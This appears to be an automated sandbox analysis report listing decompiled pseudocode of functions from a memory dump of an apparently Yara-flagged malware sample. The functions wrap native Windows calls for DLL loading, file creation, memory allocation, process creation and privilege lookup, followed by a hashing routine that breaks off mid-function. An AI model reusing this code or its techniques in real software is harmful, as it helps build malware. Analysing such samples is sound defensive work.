            • Instruction Fuzzy Hash: DCF0A4B2210208ABCB14DF89DC91EEB77ADAF8C754F158249BA1D97241D630E8518BA4
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 100%
            			E0040ACD0(void* __eflags, void* _a4, intOrPtr _a8) {
            				char* _v8;
            				struct _EXCEPTION_RECORD _v12;
            				struct _OBJDIR_INFORMATION _v16;
            				char _v536;
            				void* _t15;
            				struct _OBJDIR_INFORMATION _t17;
            				struct _OBJDIR_INFORMATION _t18;
            				void* _t30;
            				void* _t31;
            				void* _t32;
            
            				_v8 =  &_v536;
            				_t15 = E0041C820( &_v12, 0x104, _a8);
            				_t31 = _t30 + 0xc;
            				if(_t15 != 0) {
            					_t17 = E0041CC40(__eflags, _v8);
            					_t32 = _t31 + 4;
            					__eflags = _t17;
            					if(_t17 != 0) {
            						E0041CEC0( &_v12, 0);
            						_t32 = _t32 + 8;
            					}
            					_t18 = E0041B070(_v8);
            					_v16 = _t18;
            					__eflags = _t18;
            					if(_t18 == 0) {
            						LdrLoadDll(0, 0,  &_v12,  &_v16); // executed
            						return _v16;
            					}
            					return _t18;
            				} else {
            					return _t15;
            				}
            			}














            APIs
            • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0040AD42
            Memory Dump Source
            • Source File: 0000000F.00000002.518976654.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
            Yara matches
            Similarity
            • API ID: Load
            • String ID:
            • API String ID: 2234796835-0
            • Opcode ID: 4e7e6ba31bbc1c6f731b244d46290ada3a087f6c5bf953407071256f7589dc13
            • Instruction ID: a31c2487d958de86685633fd431b3ef9c8f0d30197873f4edf114e6b439d7a00
            • Opcode Fuzzy Hash: 4e7e6ba31bbc1c6f731b244d46290ada3a087f6c5bf953407071256f7589dc13
            • Instruction Fuzzy Hash: A2015EB5D4020DBBDB10EBA5DC82FDEB7799B54308F0041AAE908A7281F634EB54CB95
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 41%
            			E00419F84(void* __ebx, void* __eflags, intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
            				void* _v117;
            				void** __esi;
            				void* __ebp;
            				long _t35;
            				void* _t48;
            
            				asm("std");
            				if(__eflags != 0) {
            					_t29 = _a4;
            					_t4 = _t29 + 0xc40; // 0xc40
            					E0041AB30(_t48, _a4, _t4,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
            					_t35 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
            					return _t35;
            				} else {
            					__edi =  *(__ebx - 0xe) * 0xffffff85;
            					_pop(ss);
            					asm("repe pop ebx");
            					__eflags = __bh;
            					__ebp = __esp;
            					__eax = _a8;
            					__esi =  &(_a8[0x311]);
            					__eax = E0041AB30(__edi, _a8, __esi,  *((intOrPtr*)(__eax + 0x10)), 0, 0x29);
            					_t20 =  &_a44; // 0x4148ea
            					__eax = _a40;
            					__eax = _a28;
            					__eax = _a16;
            					__eax =  *( *__esi)(_a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40,  *_t20, __esi, __ebp);
            					_pop(__esi);
            					_pop(__ebp);
            					return _a16;
            				}
            			}









            APIs
            • NtCreateFile.NTDLL(00000060,00409CD3,?,00414B87,00409CD3,FFFFFFFF,?,?,FFFFFFFF,00409CD3,00414B87,?,00409CD3,00000060,00000000,00000000), ref: 00419F7D
            Memory Dump Source
            • Source File: 0000000F.00000002.518976654.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
            Yara matches
            Similarity
            • API ID: CreateFile
            • String ID:
            • API String ID: 823142352-0
            • Opcode ID: 109b8b15c0f3a96ea266e8b2be412142e2e63ab973e528af39710352aca04b7b
            • Instruction ID: 806c5cbf8416d0edd4430d3c78efeca276bf835534545846d60436d6be786da4
            • Opcode Fuzzy Hash: 109b8b15c0f3a96ea266e8b2be412142e2e63ab973e528af39710352aca04b7b
            • Instruction Fuzzy Hash: E601D2B2211108AFCB18CF99DC95EEB77A9EF8C354F158249FA0DA7241C634E851CBA4
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 64%
            			E00419F2A(void* __edx, intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
            				void* _v117;
            				long _t23;
            				void* _t35;
            
            				asm("lodsb");
            				asm("adc esp, edi");
            				_t17 = _a4;
            				_t4 = _t17 + 0xc40; // 0xc40
            				E0041AB30(_t35, _a4, _t4,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
            				_t23 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
            				return _t23;
            			}







            APIs
            • NtCreateFile.NTDLL(00000060,00409CD3,?,00414B87,00409CD3,FFFFFFFF,?,?,FFFFFFFF,00409CD3,00414B87,?,00409CD3,00000060,00000000,00000000), ref: 00419F7D
            Memory Dump Source
            • Source File: 0000000F.00000002.518976654.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
            Yara matches
            Similarity
            • API ID: CreateFile
            • String ID:
            • API String ID: 823142352-0
            • Opcode ID: 19ebbe29606071f2a955f4a78693b8cd1e330b947aeda67dce1b63b862adc39a
            • Instruction ID: b52a10880585f80ea1b07826ec03a1f01c2fedc779ae387f581daa47db65c9ed
            • Opcode Fuzzy Hash: 19ebbe29606071f2a955f4a78693b8cd1e330b947aeda67dce1b63b862adc39a
            • Instruction Fuzzy Hash: 9201F2B2211108BFCB08CF98DC91EEB37AAAF8C354F158208FA0DD3241C630E811CBA0
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 100%
            			E00419F30(intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
            				long _t21;
            				void* _t31;
            
            				_t3 = _a4 + 0xc40; // 0xc40
            				E0041AB30(_t31, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
            				_t21 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
            				return _t21;
            			}






            APIs
            • NtCreateFile.NTDLL(00000060,00409CD3,?,00414B87,00409CD3,FFFFFFFF,?,?,FFFFFFFF,00409CD3,00414B87,?,00409CD3,00000060,00000000,00000000), ref: 00419F7D
            Memory Dump Source
            • Source File: 0000000F.00000002.518976654.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
            Yara matches
            Similarity
            • API ID: CreateFile
            • String ID:
            • API String ID: 823142352-0
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 100%
            			E0041A110(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
            				long _t14;
            				void* _t21;
            
            				_t3 = _a4 + 0xc60; // 0xca0
            				E0041AB30(_t21, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
            				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
            				return _t14;
            			}






            APIs
            • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041AD04,?,00000000,?,00003000,00000040,00000000,00000000,00409CD3), ref: 0041A149
            Memory Dump Source
            • Source File: 0000000F.00000002.518976654.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
            Yara matches
            Similarity
            • API ID: AllocateMemoryVirtual
            • String ID:
            • API String ID: 2167126740-0
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 82%
            			E0041A05B() {
            				long _t8;
            				void* _t11;
            
            				_pop(es);
            				_t5 =  *0x555F0254;
            				_t2 = _t5 + 0x10; // 0x300
            				_t3 = _t5 + 0xc50; // 0x40a923
            				E0041AB30(_t11,  *0x555F0254, _t3,  *_t2, 0, 0x2c);
            				_t8 = NtClose( *0x555F0258); // executed
            				return _t8;
            			}






            APIs
            • NtClose.NTDLL(00414D20,?,?,00414D20,00409CD3,FFFFFFFF), ref: 0041A085
            Memory Dump Source
            • Source File: 0000000F.00000002.518976654.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
            Yara matches
            Similarity
            • API ID: Close
            • String ID:
            • API String ID: 3535843008-0
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 100%
            			E0041A060(intOrPtr _a4, void* _a8) {
            				long _t8;
            				void* _t11;
            
            				_t5 = _a4;
            				_t2 = _t5 + 0x10; // 0x300
            				_t3 = _t5 + 0xc50; // 0x40a923
            				E0041AB30(_t11, _a4, _t3,  *_t2, 0, 0x2c);
            				_t8 = NtClose(_a8); // executed
            				return _t8;
            			}






            APIs
            • NtClose.NTDLL(00414D20,?,?,00414D20,00409CD3,FFFFFFFF), ref: 0041A085
            Memory Dump Source
            • Source File: 0000000F.00000002.518976654.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
            Yara matches
            Similarity
            • API ID: Close
            • String ID:
            • API String ID: 3535843008-0
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 93%
            			E00409A90(intOrPtr _a4) {
            				intOrPtr _v8;
            				char _v24;
            				char _v284;
            				char _v804;
            				char _v840;
            				void* _t24;
            				void* _t31;
            				void* _t33;
            				void* _t34;
            				void* _t39;
            				void* _t50;
            				intOrPtr _t52;
            				void* _t53;
            				void* _t54;
            				void* _t55;
            				void* _t56;
            
            				_t52 = _a4;
            				_t39 = 0; // executed
            				_t24 = E00407E80(_t52,  &_v24); // executed
            				_t54 = _t53 + 8;
            				if(_t24 != 0) {
            					E00408090( &_v24,  &_v840);
            					_t55 = _t54 + 8;
            					do {
            						E0041B9E0( &_v284, 0x104);
            						E0041C050( &_v284,  &_v804);
            						_t56 = _t55 + 0x10;
            						_t50 = 0x4f;
            						while(1) {
            							_t31 = E00414DC0(E00414D60(_t52, _t50),  &_v284);
            							_t56 = _t56 + 0x10;
            							if(_t31 != 0) {
            								break;
            							}
            							_t50 = _t50 + 1;
            							if(_t50 <= 0x62) {
            								continue;
            							} else {
            							}
            							goto L8;
            						}
            						_t9 = _t52 + 0x14; // 0xffffe045
            						 *(_t52 + 0x474) =  *(_t52 + 0x474) ^  *_t9;
            						_t39 = 1;
            						L8:
            						_t33 = E004080C0( &_v24,  &_v840);
            						_t55 = _t56 + 8;
            					} while (_t33 != 0 && _t39 == 0);
            					_t34 = E00408140(_t52,  &_v24); // executed
            					if(_t39 == 0) {
            						asm("rdtsc");
            						asm("rdtsc");
            						_v8 = _t34 - 0 + _t34;
            						 *((intOrPtr*)(_t52 + 0x55c)) =  *((intOrPtr*)(_t52 + 0x55c)) + 0xffffffba;
            					}
            					 *((intOrPtr*)(_t52 + 0x31)) =  *((intOrPtr*)(_t52 + 0x31)) + _t39;
            					_t20 = _t52 + 0x31; // 0x5608758b
            					 *((intOrPtr*)(_t52 + 0x32)) =  *((intOrPtr*)(_t52 + 0x32)) +  *_t20 + 1;
            					return 1;
            				} else {
            					return _t24;
            				}
            			}




















            Memory Dump Source
            • Source File: 0000000F.00000002.518976654.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
            Yara matches
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 82%
            			E004082E8(signed int __eax, intOrPtr _a4, long _a8) {
            				char _v67;
            				char _v68;
            				void* _t14;
            				int _t15;
            				long _t24;
            				int _t29;
            				void* _t32;
            				void* _t34;
            				signed int _t39;
            
            				_t39 = __eax | 0x557fdd9d;
            				_t32 = _t34;
            				_v68 = 0;
            				E0041BA30( &_v67, 0, 0x3f);
            				E0041C5D0( &_v68, 3);
            				_t14 = E0040ACD0(_t39, _a4 + 0x1c,  &_v68); // executed
            				_t15 = E00414E20(_a4 + 0x1c, _t14, 0, 0, 0xc4e7b6d6);
            				_t29 = _t15;
            				if(_t29 != 0) {
            					_t24 = _a8;
            					_t15 = PostThreadMessageW(_t24, 0x111, 0, 0); // executed
            					_t41 = _t15;
            					if(_t15 == 0) {
            						_t15 =  *_t29(_t24, 0x8003, _t32 + (E0040A460(_t41, 1, 8) & 0x000000ff) - 0x40, _t15);
            					}
            				}
            				return _t15;
            			}













            APIs
            • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040834A
            Memory Dump Source
            • Source File: 0000000F.00000002.518976654.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
            Yara matches
            Similarity
            • API ID: MessagePostThread
            • String ID:
            • API String ID: 1836367815-0
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 82%
            			E004082F0(void* __eflags, intOrPtr _a4, long _a8) {
            				char _v67;
            				char _v68;
            				void* _t12;
            				intOrPtr* _t13;
            				int _t14;
            				long _t21;
            				intOrPtr* _t25;
            				void* _t26;
            				void* _t30;
            
            				_t30 = __eflags;
            				_v68 = 0;
            				E0041BA30( &_v67, 0, 0x3f);
            				E0041C5D0( &_v68, 3);
            				_t12 = E0040ACD0(_t30, _a4 + 0x1c,  &_v68); // executed
            				_t13 = E00414E20(_a4 + 0x1c, _t12, 0, 0, 0xc4e7b6d6);
            				_t25 = _t13;
            				if(_t25 != 0) {
            					_t21 = _a8;
            					_t14 = PostThreadMessageW(_t21, 0x111, 0, 0); // executed
            					_t32 = _t14;
            					if(_t14 == 0) {
            						_t14 =  *_t25(_t21, 0x8003, _t26 + (E0040A460(_t32, 1, 8) & 0x000000ff) - 0x40, _t14);
            					}
            					return _t14;
            				}
            				return _t13;
            			}













            APIs
            • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040834A
            Memory Dump Source
            • Source File: 0000000F.00000002.518976654.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
            Yara matches
            Similarity
            • API ID: MessagePostThread
            • String ID:
            • API String ID: 1836367815-0
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 37%
            			E0041A2AD(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr _a40, intOrPtr _a44, intOrPtr _a48, intOrPtr _a52) {
            				void* _t22;
            				void* _t34;
            				intOrPtr* _t35;
            				void* _t37;
            
            				_t16 = _a4;
            				_t2 = _t16 + 0xa14; // 0xfffde485
            				_t3 = _t16 + 0xc80; // 0x409989
            				_t35 = _t3;
            				E0041AB30(0x8b554432, _a4, _t35,  *_t2, 0, 0x37);
            				_t22 =  *((intOrPtr*)( *_t35))(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48, _a52, _t34, _t37); // executed
            				return _t22;
            			}








            APIs
            • CreateProcessInternalW.KERNELBASE(00408C9D,00408CC5,00408A5D,00000010,00408CC5,00000044,?,?,?,00000044,00408CC5,00000010,00408A5D,00408CC5,00408C9D,00408D09), ref: 0041A304
            Memory Dump Source
            • Source File: 0000000F.00000002.518976654.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
            Yara matches
            Similarity
            • API ID: CreateInternalProcess
            • String ID:
            • API String ID: 2186235152-0
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 37%
            			E0041A2B0(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr _a40, intOrPtr _a44, intOrPtr _a48, intOrPtr _a52) {
            				void* _t22;
            				void* _t33;
            				intOrPtr* _t34;
            
            				_t16 = _a4;
            				_t2 = _t16 + 0xa14; // 0xfffde485
            				_t3 = _t16 + 0xc80; // 0x409989
            				_t34 = _t3;
            				E0041AB30(_t33, _a4, _t34,  *_t2, 0, 0x37);
            				_t22 =  *((intOrPtr*)( *_t34))(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48, _a52); // executed
            				return _t22;
            			}







            APIs
            • CreateProcessInternalW.KERNELBASE(00408C9D,00408CC5,00408A5D,00000010,00408CC5,00000044,?,?,?,00000044,00408CC5,00000010,00408A5D,00408CC5,00408C9D,00408D09), ref: 0041A304
            Memory Dump Source
            • Source File: 0000000F.00000002.518976654.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
            Yara matches
            Similarity
            • API ID: CreateInternalProcess
            • String ID:
            • API String ID: 2186235152-0
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 100%
            			E0041A240(intOrPtr _a4, void* _a8, long _a12, void* _a16) {
            				char _t10;
            				void* _t15;
            
            				_t3 = _a4 + 0xc74; // 0xc74
            				E0041AB30(_t15, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x35);
            				_t10 = RtlFreeHeap(_a8, _a12, _a16); // executed
            				return _t10;
            			}






            APIs
            • RtlFreeHeap.NTDLL(00000060,00409CD3,?,?,00409CD3,00000060,00000000,00000000,?,?,00409CD3,?,00000000), ref: 0041A26D
            Memory Dump Source
            • Source File: 0000000F.00000002.518976654.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
            Yara matches
            Similarity
            • API ID: FreeHeap
            • String ID:
            • API String ID: 3298025750-0
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 100%
            			E0041A200(intOrPtr _a4, void* _a8, long _a12, long _a16) {
            				void* _t10;
            				void* _t15;
            
            				E0041AB30(_t15, _a4, _a4 + 0xc70,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x34);
            				_t10 = RtlAllocateHeap(_a8, _a12, _a16); // executed
            				return _t10;
            			}






            APIs
            • RtlAllocateHeap.NTDLL(00414506,?,00414C7F,00414C7F,?,00414506,?,?,?,?,?,00000000,00409CD3,?), ref: 0041A22D
            Memory Dump Source
            • Source File: 0000000F.00000002.518976654.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
            Yara matches
            Similarity
            • API ID: AllocateHeap
            • String ID:
            • API String ID: 1279760036-0
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 100%
            			E0041A3A0(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
            				int _t10;
            				void* _t15;
            
            				E0041AB30(_t15, _a4, _a4 + 0xc8c,  *((intOrPtr*)(_a4 + 0xa18)), 0, 0x46);
            				_t10 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
            				return _t10;
            			}






            APIs
            • LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1A2,0040F1A2,0000003C,00000000,?,00409D45), ref: 0041A3D0
            Memory Dump Source
            • Source File: 0000000F.00000002.518976654.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
            Yara matches
            Similarity
            • API ID: LookupPrivilegeValue
            • String ID:
            • API String ID: 3899507212-0
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 100%
            			E0041A280(intOrPtr _a4, int _a8) {
            				void* _t10;
            
            				_t5 = _a4;
            				E0041AB30(_t10, _a4, _a4 + 0xc7c,  *((intOrPtr*)(_t5 + 0xa14)), 0, 0x36);
            				ExitProcess(_a8);
            			}





            APIs
            • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A2A8
            Memory Dump Source
            • Source File: 0000000F.00000002.518976654.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
            Yara matches
            Similarity
            • API ID: ExitProcess
            • String ID:
            • API String ID: 621844428-0
            Uniqueness

            Uniqueness Score: -1.00%

            Non-executed Functions

            C-Code - Quality: 73%
            			E00409E40(signed int* _a4) {
            				signed int _v8;
            				signed int _v12;
            				signed int _v16;
            				char _v304;
            				signed char* _t277;
            				signed int* _t278;
            				signed int _t279;
            				signed int _t285;
            				signed int _t288;
            				signed int _t292;
            				signed int _t295;
            				signed int _t299;
            				signed int _t303;
            				signed int _t305;
            				signed int _t311;
            				signed int _t318;
            				signed int _t320;
            				signed int _t323;
            				signed int _t325;
            				signed int _t334;
            				signed int _t340;
            				signed int _t341;
            				signed int _t346;
            				signed int _t353;
            				signed int _t357;
            				signed int _t358;
            				signed int _t362;
            				signed int _t365;
            				signed int _t369;
            				signed int _t370;
            				signed int _t399;
            				signed int _t404;
            				signed int _t410;
            				signed int _t413;
            				signed int _t420;
            				signed int _t423;
            				signed int _t432;
            				signed int _t434;
            				signed int _t437;
            				signed int _t445;
            				signed int _t459;
            				signed int _t462;
            				signed int _t463;
            				signed int _t464;
            				signed int _t470;
            				signed int _t478;
            				signed int _t479;
            				signed int* _t480;
            				signed int* _t481;
            				signed int _t488;
            				signed int _t491;
            				signed int _t496;
            				signed int _t499;
            				signed int _t502;
            				signed int _t505;
            				signed int _t506;
            				signed int _t510;
            				signed int _t522;
            				signed int _t525;
            				signed int _t532;
            				void* _t536;
            
            				_t481 = _a4;
            				_t353 = 0;
            				_t2 =  &(_t481[7]); // 0x1b
            				_t277 = _t2;
            				do {
            					 *(_t536 + _t353 * 4 - 0x14c) = ((( *(_t277 - 1) & 0x000000ff) << 0x00000008 |  *_t277 & 0x000000ff) << 0x00000008 | _t277[1] & 0x000000ff) << 0x00000008 | _t277[2] & 0x000000ff;
            					 *(_t536 + _t353 * 4 - 0x148) = (((_t277[3] & 0x000000ff) << 0x00000008 | _t277[4] & 0x000000ff) << 0x00000008 | _t277[5] & 0x000000ff) << 0x00000008 | _t277[6] & 0x000000ff;
            					 *(_t536 + _t353 * 4 - 0x144) = (((_t277[7] & 0x000000ff) << 0x00000008 | _t277[8] & 0x000000ff) << 0x00000008 | _t277[9] & 0x000000ff) << 0x00000008 | _t277[0xa] & 0x000000ff;
            					 *(_t536 + _t353 * 4 - 0x140) = (((_t277[0xb] & 0x000000ff) << 0x00000008 | _t277[0xc] & 0x000000ff) << 0x00000008 | _t277[0xd] & 0x000000ff) << 0x00000008 | _t277[0xe] & 0x000000ff;
            					_t353 = _t353 + 4;
            					_t277 =  &(_t277[0x10]);
            				} while (_t353 < 0x10);
            				_t278 =  &_v304;
            				_v8 = 0x10;
            				do {
            					_t399 =  *(_t278 - 0x18);
            					_t459 =  *(_t278 - 0x14);
            					_t357 =  *(_t278 - 0x20) ^ _t278[5] ^  *_t278 ^ _t399;
            					asm("rol ecx, 1");
            					asm("rol ebx, 1");
            					_t278[9] =  *(_t278 - 0x1c) ^ _t278[6] ^ _t278[1] ^ _t459;
            					_t278[8] = _t357;
            					_t318 = _t278[7] ^  *(_t278 - 0x10) ^ _t278[2];
            					_t278 =  &(_t278[4]);
            					asm("rol ebx, 1");
            					asm("rol edx, 1");
            					_t46 =  &_v8;
            					 *_t46 = _v8 - 1;
            					_t278[6] = _t318 ^ _t399;
            					_t278[7] =  *(_t278 - 0x1c) ^  *(_t278 - 4) ^ _t357 ^ _t459;
            				} while ( *_t46 != 0);
            				_t320 =  *_t481;
            				_t279 = _t481[1];
            				_t358 = _t481[2];
            				_t404 = _t481[3];
            				_v12 = _t320;
            				_v16 = _t481[4];
            				_v8 = 0;
            				do {
            					asm("rol ebx, 0x5");
            					_t462 = _v8;
            					_t488 = _t320 + ( !_t279 & _t404 | _t358 & _t279) +  *((intOrPtr*)(_t536 + _t462 * 4 - 0x14c)) + _v16 + 0x5a827999;
            					_t323 = _v12;
            					asm("ror eax, 0x2");
            					_v16 = _t404;
            					_v12 = _t488;
            					asm("rol esi, 0x5");
            					_v8 = _t358;
            					_t410 = _t488 + ( !_t323 & _t358 | _t279 & _t323) +  *((intOrPtr*)(_t536 + _t462 * 4 - 0x148)) + _v16 + 0x5a827999;
            					_t491 = _t279;
            					asm("ror ebx, 0x2");
            					_v16 = _v8;
            					_t362 = _v12;
            					_v8 = _t323;
            					_t325 = _v8;
            					_v12 = _t410;
            					asm("rol edx, 0x5");
            					_t285 = _t410 + ( !_t362 & _t491 | _t323 & _t362) +  *((intOrPtr*)(_t536 + _t462 * 4 - 0x144)) + _v16 + 0x5a827999;
            					_t413 = _v12;
            					_v16 = _t491;
            					asm("ror ecx, 0x2");
            					_v8 = _t362;
            					_v12 = _t285;
            					asm("rol eax, 0x5");
            					_v16 = _t325;
            					_t496 = _t285 + ( !_t413 & _t325 | _t362 & _t413) +  *((intOrPtr*)(_t536 + _t462 * 4 - 0x140)) + _v16 + 0x5a827999;
            					_t358 = _v12;
            					_t288 = _v8;
            					asm("ror edx, 0x2");
            					_v8 = _t413;
            					_v12 = _t496;
            					asm("rol esi, 0x5");
            					_v16 = _t288;
            					_t279 = _v12;
            					_t499 = _t496 + ( !_t358 & _t288 | _t413 & _t358) +  *((intOrPtr*)(_t536 + _t462 * 4 - 0x13c)) + _v16 + 0x5a827999;
            					_t404 = _v8;
            					asm("ror ecx, 0x2");
            					_t463 = _t462 + 5;
            					_t320 = _t499;
            					_v12 = _t320;
            					_v8 = _t463;
            				} while (_t463 < 0x14);
            				_t464 = 0x14;
            				do {
            					asm("rol esi, 0x5");
            					asm("ror eax, 0x2");
            					_v16 = _t404;
            					_t502 = _t499 + (_t404 ^ _t358 ^ _t279) +  *((intOrPtr*)(_t536 + _t464 * 4 - 0x14c)) + _v16 + 0x6ed9eba1;
            					_t334 = _v12;
            					_v12 = _t502;
            					asm("rol esi, 0x5");
            					_t420 = _t502 + (_t358 ^ _t279 ^ _t334) +  *((intOrPtr*)(_t536 + _t464 * 4 - 0x148)) + _v16 + 0x6ed9eba1;
            					asm("ror ebx, 0x2");
            					_t505 = _t279;
            					_v16 = _t358;
            					_t365 = _v12;
            					_v12 = _t420;
            					asm("rol edx, 0x5");
            					asm("ror ecx, 0x2");
            					_t292 = _t420 + (_t279 ^ _t334 ^ _t365) +  *((intOrPtr*)(_t536 + _t464 * 4 - 0x144)) + _v16 + 0x6ed9eba1;
            					_t423 = _v12;
            					_v8 = _t334;
            					_v8 = _t365;
            					_v12 = _t292;
            					asm("rol eax, 0x5");
            					_t464 = _t464 + 5;
            					_t358 = _v12;
            					asm("ror edx, 0x2");
            					_t146 = _t505 + 0x6ed9eba1; // 0x6ed9eb9f
            					_t506 = _t292 + (_t334 ^ _v8 ^ _t423) +  *((intOrPtr*)(_t536 + _t464 * 4 - 0x154)) + _t146;
            					_t295 = _v8;
            					_v8 = _t423;
            					_v12 = _t506;
            					asm("rol esi, 0x5");
            					_t404 = _v8;
            					_t499 = _t506 + (_t295 ^ _v8 ^ _t358) +  *((intOrPtr*)(_t536 + _t464 * 4 - 0x150)) + _t334 + 0x6ed9eba1;
            					_v16 = _t295;
            					_t279 = _v12;
            					asm("ror ecx, 0x2");
            					_v12 = _t499;
            				} while (_t464 < 0x28);
            				_v8 = 0x28;
            				do {
            					asm("rol esi, 0x5");
            					_v16 = _t404;
            					asm("ror eax, 0x2");
            					_t510 = ((_t358 | _t279) & _t404 | _t358 & _t279) +  *((intOrPtr*)(_t536 + _v8 * 4 - 0x14c)) + _t499 + _v16 - 0x70e44324;
            					_t470 = _v12;
            					_v12 = _t510;
            					asm("rol esi, 0x5");
            					_t340 = _v8;
            					asm("ror edi, 0x2");
            					_t432 = ((_t279 | _t470) & _t358 | _t279 & _t470) +  *((intOrPtr*)(_t536 + _t340 * 4 - 0x148)) + _t510 + _v16 - 0x70e44324;
            					_v16 = _t358;
            					_t369 = _v12;
            					_v12 = _t432;
            					asm("rol edx, 0x5");
            					_v8 = _t279;
            					_t434 = ((_t470 | _t369) & _t279 | _t470 & _t369) +  *((intOrPtr*)(_t536 + _t340 * 4 - 0x144)) + _t432 + _v16 - 0x70e44324;
            					asm("ror ecx, 0x2");
            					_v16 = _v8;
            					_t299 = _v12;
            					_v8 = _t470;
            					_v12 = _t434;
            					asm("rol edx, 0x5");
            					asm("ror eax, 0x2");
            					_t522 = ((_t369 | _t299) & _t470 | _t369 & _t299) +  *((intOrPtr*)(_t536 + _t340 * 4 - 0x140)) + _t434 + _v16 - 0x70e44324;
            					_v16 = _v8;
            					_t437 = _t369;
            					_t358 = _v12;
            					_v8 = _t437;
            					_v12 = _t522;
            					asm("rol esi, 0x5");
            					_v16 = _v8;
            					_t499 = ((_t299 | _t358) & _t437 | _t299 & _t358) +  *((intOrPtr*)(_t536 + _t340 * 4 - 0x13c)) + _t522 + _v16 - 0x70e44324;
            					_t404 = _t299;
            					_t279 = _v12;
            					asm("ror ecx, 0x2");
            					_v12 = _t499;
            					_t341 = _t340 + 5;
            					_v8 = _t341;
            				} while (_t341 < 0x3c);
            				_t478 = 0x3c;
            				_v8 = 0x3c;
            				do {
            					asm("rol esi, 0x5");
            					_t479 = _v8;
            					asm("ror eax, 0x2");
            					_t525 = (_t404 ^ _t358 ^ _t279) +  *((intOrPtr*)(_t536 + _t478 * 4 - 0x14c)) + _t499 + _v16 - 0x359d3e2a;
            					_t346 = _v12;
            					_v16 = _t404;
            					_v12 = _t525;
            					asm("rol esi, 0x5");
            					asm("ror ebx, 0x2");
            					_t445 = (_t358 ^ _t279 ^ _t346) +  *((intOrPtr*)(_t536 + _t479 * 4 - 0x148)) + _t525 + _v16 - 0x359d3e2a;
            					_v16 = _t358;
            					_t370 = _v12;
            					_v12 = _t445;
            					asm("rol edx, 0x5");
            					_v16 = _t279;
            					asm("ror ecx, 0x2");
            					_t303 = (_t279 ^ _t346 ^ _t370) +  *((intOrPtr*)(_t536 + _t479 * 4 - 0x144)) + _t445 + _v16 - 0x359d3e2a;
